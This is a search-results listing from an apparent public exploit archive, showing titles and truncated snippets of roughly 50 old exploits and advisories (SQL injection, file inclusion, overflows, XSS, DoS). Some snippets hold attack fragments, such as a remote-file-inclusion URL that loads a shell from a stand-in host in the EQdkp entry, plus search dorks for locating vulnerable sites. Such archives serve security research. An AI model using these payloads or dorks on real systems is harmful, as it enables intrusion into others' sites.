41207 matches found
Avast! 4.8.1335 Professional - Kernel Local Buffer Overflow
Avast! 4.8.1335 Professional - Kernel Local Buffer Overflow include include include include include include / Program : avast! 4.8.1335 Professionnel Homepage : http://www.avast.com Discovery : 2009/07/29 Author Contacted : 2009/07/31 Found by : Heurs This Advisory : Heurs Contact :...
Mozilla Firefox 3.5 (OSX) - Font Tags Remote Buffer Overflow
Mozilla Firefox 3.5 OSX - Font Tags Remote Buffer Overflow !/usr/bin/env python FireFox 3.5 Heap Spray OS X Exploit Modified by: DrIDE Originally Discovered by: Simon Berry-Bryne Pythonized by: David Kennedy ReL1K @ SecureState Thanks to HDM Tested on OS X 10.5.7 from BaseHTTPServer import...
XOOPS 2.3.3 - .htaccess Remote File Disclosure
XOOPS 2.3.3 - .htaccess Remote File Disclosure ======================================================================== XOOPS = 2.3.3 Remote Arbitrary File Retrieval ======================================================================== Affected Software : XOOPS = 2.3.3 Author : Luca "daath" De...
MiniTwitter 0.2b - Remote User Options Changer
MiniTwitter 0.2b - Remote User Options Changer || || || -----------------------------------------\ == -- ----------- ---------------------------- ------------------/ ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O ¡PROUD TO BE SPANISH!...
Zervit Web Server 0.3 - sockets++ crash Remote Denial of Service
Zervit Web Server 0.3 - sockets++ crash Remote Denial of Service !/usr/bin/perl Zervit HTTP Server \n"; print "- Exemple: file.pl 127.0.0.1 80\n"; exit; $ip = $ARGV0; $port = $ARGV1; print "+ Sending request...\n"; for$i=0;$i=4;$i++ $socket = IO::Socket::INET-new Proto = "tcp", PeerAddr = "$ip",...
net2ftp 0.97 - Cross-Site Scripting Request Forgery
net2ftp 0.97 - Cross-Site Scripting Request Forgery =cicatriz ==advisories= / / / / // / / // / o / / .-/ =net2ftp = 0.97 Cross-Site Scripting/Request Forgery==/= == =Advisory & Vulnerability Information=== Title: net2ftp = 0.97 Cross-Site Scripting/Request Forgery Advisory ID: VUDO-2009-0804...
pam-krb5 3.13 - Local Privilege Escalation
pam-krb5 3.13 - Local Privilege Escalation / cve-2009-0360.c pam-krb5 http://jon.oberheide.org Information: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0360 pam-krb5 before 3.13, when linked against MIT Kerberos, does not properly initialize the Kerberos libraries for setuid use, which...
Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities
Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities Louhi Networks Oy -= Security Advisory =- Advisory: Rittal CMC-TC Processing Unit II multiple vulnerabilities Release Date: 2009-03-23 Last Modified: 2009-03-22 Authors: Henri Lindberg, CISA henri d0t lindberg at louhi d0t fi Application...
POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow (SEH)
POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow SEH !/usr/bin/perl KL0209EXP-poppeeperuidl-bof.pl 02.27.2009 Krakow Labs Development www.krakowlabs.com POP Peeper 3.4.0.0 UIDL Remote Buffer Overflow Exploit SEH overwrite exploitation, uses Imap.dll included with POP Peeper for universal...
eVision CMS 2.0 - Remote Code Execution
eVision CMS 2.0 - Remote Code Execution !/usr/bin/perl ----------------------------------------------------------------------------- INFORMATIONS ----------------------------------------------------------------------------- eVision CMS 2.0...
Roundcube Webmail 0.2b - Remote Code Execution
Roundcube Webmail 0.2b - Remote Code Execution !/bin/sh I was hoping the PoC would not appear so soon, but now that it is out, i thought i might as well publish my real exploit. Hunger http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5619 FOR LEARNING PURPOSES ONLY! PHP...
Web Calendar System 3.40 - Cross-Site Scripting SQL Injection
Web Calendar System 3.40 - Cross-Site Scripting SQL Injection 000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0...
e-Vision CMS 2.0.2 - Multiple Local File Inclusions
e-Vision CMS 2.0.2 - Multiple Local File Inclusions starting; $exploit-i...
Joomla! Component Ignite Gallery 0.8.3 - SQL Injection
Joomla! Component Ignite Gallery 0.8.3 - SQL Injection Joomla Component Ignite Gallery SQL Injection Vulnerability Vulnerability found by: H!tm@N Contact: hitmanatkhg-crewdotws Site: www.khg-crew.ws Greetz: boom3rang, KHG, urtan, chs, redc00de - -=Kosova Hackers Group=- ScriptName: "Joomla"...
CitectSCADA ODBC Server - Remote Stack Buffer Overflow (Metasploit)
CitectSCADA ODBC Server - Remote Stack Buffer Overflow Metasploit $Id: citectscadaodbc.rb This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...
Reciprocal Links Manager 1.1 - site SQL Injection
Reciprocal Links Manager 1.1 - site SQL Injection || | | Reciprocal Links Manager 1.1 site Remote SQL Injection Vulnerability | | |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : WwW.Hussin-X.CoM | www.tryag.cc/cc | | email: darkangelg85atYahooDoTcom | | | | |...
Claroline 1.8.9 - clarolineredirector.php?url Arbitrary Site Redirect
Claroline 1.8.9 - clarolineredirector.php?url Arbitrary Site Redirect source: https://www.securityfocus.com/bid/30269/info Claroline is prone to multiple input-validation vulnerabilities: 1. Multiple cross-site scripting vulnerabilities. 2. A remote URI-redirection vulnerability. An attacker may...
SNMPv3 - HMAC Validation error Remote Authentication Bypass
SNMPv3 - HMAC Validation error Remote Authentication Bypass snmpv3exp.sh exploit the vulnerability described in CVE-2008-0960, the HMAC check problem on multiple vendor Copyright c 2008 @ Mediaservice.net Srl. All rights reserved Wrote by Maurizio Agazzini http://lab.mediaservice.net/...
C6 Messenger - ActiveX Remote Download and Execute
C6 Messenger - ActiveX Remote Download and Execute !-- C6 Messenger Installation Url DownloaderActiveX Control Remote Download & Execute Exploit by Nine:Situations:Group::SnoopyAssault site: http://retrogod.altervista.org/ "C6 Messenger is an instant messaging program produced by Telecom Italia...
Creative Software AutoUpdate Engine - ActiveX Stack Overflow
Creative Software AutoUpdate Engine - ActiveX Stack Overflow +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ CacheFolder property is vulnerable to stack-based buffer overflow after 260 bytes, @ 512 bytes overwrites SEH and allows code execution reliably. Original Advisory @...
KwsPHP - Upload Remote Code Execution
KwsPHP - Upload Remote Code Execution -login -pass -email -file -id \n\n"; print "Url url of KwsPHP script : Ex : www.example.com/kwsphp/\n"; print "Login your account's login need to be allow to upload \n"; print "Pass account's password\n"; print "Email account's email\n"; print "File PHP scrip...
sCssBoard (Multiple Versions) - pwnpack Remote s
sCssBoard Multiple Versions - pwnpack Remote s !/usr/bin/ruby inphex - i didnt include all of those bugs into the code,this code basicly checks if the forum is vulnerable and also exploits SQL Injection bug! all versions on sourceforge seem to be the same ;\ so check is beeing done on each versio...
Rejetto HTTP File Server (HFS) 1.52.x - Multiple Vulnerabilities
Rejetto HTTP File Server HFS 1.52.x - Multiple Vulnerabilities source: https://www.securityfocus.com/bid/27423/info HFS HTTP File Server is prone to multiple security vulnerabilities, including cross-site scripting issues, an information-disclosure issue, an arbitrary file-creation issue, a...
Content Injector 1.53 - index.php SQL Injection
Content Injector 1.53 - index.php SQL Injection --==+================================================================================+==-- --==+ Content Injector V1.53 SQL Injection Vulnerbility +==-- --==+================================================================================+==-- AUTHO...
ht:Dig 3.2 - Htsearch Cross-Site Scripting
ht:Dig 3.2 - Htsearch Cross-Site Scripting source: https://www.securityfocus.com/bid/26610/info ht://Dig is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue allows an attacker to execute arbitrary HTML or script code...
PHP Project Management 0.8.10 - Multiple LocalRemote File Inclusions
PHP Project Management 0.8.10 - Multiple LocalRemote File Inclusions PHP Project Management = 0.8.10 Multiple RFI / LFI Vulnerabilities http://surfnet.dl.sourceforge.net/sourceforge/php-pm/release-0.8.tar.gz DORK : "PHP Project Management 0.8.10" POC : RFI...
nuseo PHP enterprise 1.6 - Remote File Inclusion
nuseo PHP enterprise 1.6 - Remote File Inclusion Vulnerability Type: Remote File Inclusion Vulnerable file: /NuSEO PHP Enterprise.v1.6 Nulled by DGT/NuSEO.PHP.Enterprise.v1.6.PHP.NULL-DGT/nuseo/admin/nuseoadmind.php Exploit URL:...
Stuffed Guys Stuffed Tracker - Multiple Cross-Site Scripting Vulnerabilities
Stuffed Guys Stuffed Tracker - Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/25931/info Stuffed Tracker is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. An attacker may...
NovaSTOR NovaNET 12.0 - Remote SYSTEM
NovaSTOR NovaNET 12.0 - Remote SYSTEM // source: https://www.securityfocus.com/bid/39693/info NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities. An attacker can exploit these issues to execute arbitrary code, access sensitive information, o...
Microsoft Visual Basic Enterprise 6.0 SP6 - Code Execution
Microsoft Visual Basic Enterprise 6.0 SP6 - Code Execution usage: vbexploit.py FileName.vbp import sys print "--------------------------------------------------------------------------" print " PoC2 Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution " print " author: shinnai" print ...
SAP DB 7.4 - WebTools Remote Overwrite (SEH)
SAP DB 7.4 - WebTools Remote Overwrite SEH / Dreatica-FXP crew ---------------------------------------- Target : SAP DB 7.4 WebTools Site : http://www.sapdb.org Found by : NGSSoftware Insight Security Research ---------------------------------------- Exploit : SAP DB 7.4 WebTools Remote SEH...
e-Vision CMS 2.02 - SQL Injection Remote Code Execution
e-Vision CMS 2.02 - SQL Injection Remote Code Execution !/usr/bin/php -q -d shortopentag=on ...need i say more? Bug 2 admin/functions.php: if isset$COOKIE'adminlang' $languageselector = $COOKIE'adminlang'; else $languageselector = "en"; include"lang/".$languageselector.".php"; ...speaks for it se...
Prototype of an PHP Application 0.1 - identdisconnect.php?path_inc Remote File Inclusion
Prototype of an PHP Application 0.1 - identdisconnect.php?pathinc Remote File Inclusion source: https://www.securityfocus.com/bid/24266/info 'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the...
Microsoft Visual Basic 6.0 Project - Company Name Stack Overflow (PoC)
Microsoft Visual Basic 6.0 Project - Company Name Stack Overflow PoC !/usr/local/bin/perl Discovered By UmZ Umair Manzoor comments are welcome at umz32.dllatgmail.com Dated 23-02-2007 Time : 02:00 AM PST Visual Basic Project Company Name Stack Overflow Affected Version : Tested on Visual basic 6...
ID Automation Linear Barcode - ActiveX Denial of Service
ID Automation Linear Barcode - ActiveX Denial of Service 2007/05/13 -------------------------------------------------------------------------------------------------- ID Automation Linear Barcode ActiveX Control IDAutomationLinear6.dll v. 1.6.0.5 DoS url: http://www.idautomation.com/ price: from...
Weatimages 1.7.1 - ini[langpack] Remote File Inclusion
Weatimages 1.7.1 - inilangpack Remote File Inclusion RFI Weatimages Hack Script name : Weatimages Script Download Adress:http://www.hotscripts.com/jump.php?listingid=52592&jumptype=1 Demo site:http://www.nazarkin.name/projects/weatimages/demo/index.php?inilangpack=shelladress Google Dork : inurl:...
MangoBery CMS 0.5.5 - quotes.php Remote File Inclusion
MangoBery CMS 0.5.5 - quotes.php Remote File Inclusion Mangobery-0.5.5 Found by kezzap66345 Script Page:http://mangobery.sourceforge.net/ Demo Site:http://mangobery.beryllium.ca/ Script Download:http://sourceforge.net/project/showfiles.php?groupid=63834&packageid=60858...
D-Link DWL-2000AP 2.11 - ARP Flood Remote Denial of Service
D-Link DWL-2000AP 2.11 - ARP Flood Remote Denial of Service / ARP FLOODER v0.1 - [email protected] - 2006-12-04 designed to crash D-LINK DWL-2000AP+ compile with: gcc arpflood.c -o arpflood / define BSDSOURCE 1 define GNUSOURCE include include include include include include include include...
KDPics 1.111.16 - galeries.inc.php3?categories Cross-Site Scripting
KDPics 1.111.16 - galeries.inc.php3?categories Cross-Site Scripting source: https://www.securityfocus.com/bid/21515/info KDPics is prone to multiple input-validation vulnerabilities, including cross-site scripting and remote file-include issues, because the application fails to sanitize...
Coppermine Photo Gallery 1.4.9 - SQL Injection
Coppermine Photo Gallery 1.4.9 - SQL Injection !/usr/bin/php ?php / Coppermine Photo Gallery 1.4.9 Remote SQL Injection Vulnerability Note: Requires a valid user account. Usage: php script.php host path table prefix user id username password Usage Example: php script.php domain.com /coppermine/...
Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)
Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation 2 source: https://www.securityfocus.com/bid/20471/info The Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability. A successful exploit of this iss...
n@board 3.1.9e - naboard_pnr.php Remote File Inclusion
n@board 3.1.9e - naboardpnr.php Remote File Inclusion n@board v3.1.9e, 3.1.8cgb ,3.1.8tc skin Remote File Include Vulnerability Turkish Hacker's Discovered By : mdx and TheBatHacker ------------------------------------------------------ Cyber-Warrior TIM Ay ve Y.ld.zlar Geceye Yak...r... the moon...
phpBB Shadow Premod 2.7.1 - Remote File Inclusion
phpBB Shadow Premod 2.7.1 - Remote File Inclusion --------------------------------------------------------------------------- Shadow Prémod = 2.7.1 phpbbrootpath Remote File Include Vulnerability --------------------------------------------------------------------------- Discovered By Kw3RLn...
Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (1)
Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow 1 / . \ \ \ \ | | / | | | | \ / / /\ \ / \ | \ / / / / 29\08\06 / || / / mm. dM8 YMMMb. dMM8 YMMMMb dMMM' YMMMb dMMMP There are doors I have yet to open YMMM MMM' windows I have yet to look through "MbdMP Going forward may not be...
Integramod Portal 2.x - functions_portal.php Remote File Inclusion
Integramod Portal 2.x - functionsportal.php Remote File Inclusion !/usr/bin/perl Method found and exploit scripted by nukedx Contacts ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: [email protected] Original advisory can be found at: http://www.nukedx.com/?viewdoc=47 Integramod Portal Copyright...
Mambo Component User Home Pages 0.5 - Remote File Inclusion
Mambo Component User Home Pages 0.5 - Remote File Inclusion Kurdish Security Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Rish : High Class : Remote Script : User Home Pges Site : www.ravensportal.co.uk Thanx :...
PixelPost 1-5rc1-2 - Privilege Escalation
PixelPost 1-5rc1-2 - Privilege Escalation !/usr/bin/php -q -d shortopentag=on ? echo "Pixelpost = 1-5rc1-2 privilege escalation exploit\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n"; echo "dork: pixelpost "RSS 2.0" "ATOM feed" "Valid xHTML / Valid...
EQdkp 1.3.0 - dbal.php Remote File Inclusion
EQdkp 1.3.0 - dbal.php Remote File Inclusion Title: EQdkp = 1.3.0 Remote File Inclusion URL: http://www.eqdkp.com/ Dork: "powered by EQdkp" Author: OLiBekaS greetz: Skulmatic, weleh, brockencode, and all papmahackerlink crew Exploit: /includes/dbal.php?eqdkprootpath=http://yourhost/cmd.gif?cmd=ls...
PHPX 3.5.x - Admin login.php SQL Injection
PHPX 3.5.x - Admin login.php SQL Injection source: https://www.securityfocus.com/bid/15680/info PHPX is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation coul...
Noahs Classifieds 1.3 - index.php Cross-Site Scripting
Noahs Classifieds 1.3 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/14835/info Noah's Classifieds is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage thi...